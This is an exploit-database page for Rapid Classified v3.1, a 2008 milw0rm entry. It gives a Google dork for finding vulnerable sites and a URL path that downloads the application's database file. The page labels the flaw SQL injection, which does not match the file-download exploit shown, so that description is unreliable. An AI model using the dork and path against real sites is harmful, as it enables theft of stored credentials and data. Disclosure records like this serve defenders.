header-logo
Suggest Exploit
vendor:
Rapid Classified
by:
CoBRa_21
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Rapid Classified
Affected Version From: v3.1
Affected Version To: v3.1
Patch Exists: YES
Related CWE: N/A
CPE: a:rapidclassified:rapid_classified:3.1
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008

Rapid Classified

The vulnerability exists due to the improper sanitization of user-supplied input in the 'db/cldb.mdb' script. A remote attacker can send a specially crafted HTTP request to the vulnerable script and execute arbitrary SQL commands in application's database. This can be exploited to bypass authentication, access, modify or delete data, etc.

Mitigation:

Input validation should be used to prevent SQL injection attacks.
Source

Exploit-DB raw data:

---------------------------------------------------------------------------

Script Name: Rapid Classified

Version: v3.1

Google Dork: intext:©2003-2008 RC v3.1 Developed by: GA Soft

Author: CoBRa_21
 
My Web Site: www.ipbul.org

---------------------------------------------------------------------------
 
Exploit:
 
http://localhost/[PATH]/db/cldb.mdb
 
 
---------------------------------------------------------------------------

# milw0rm.com [2008-12-02]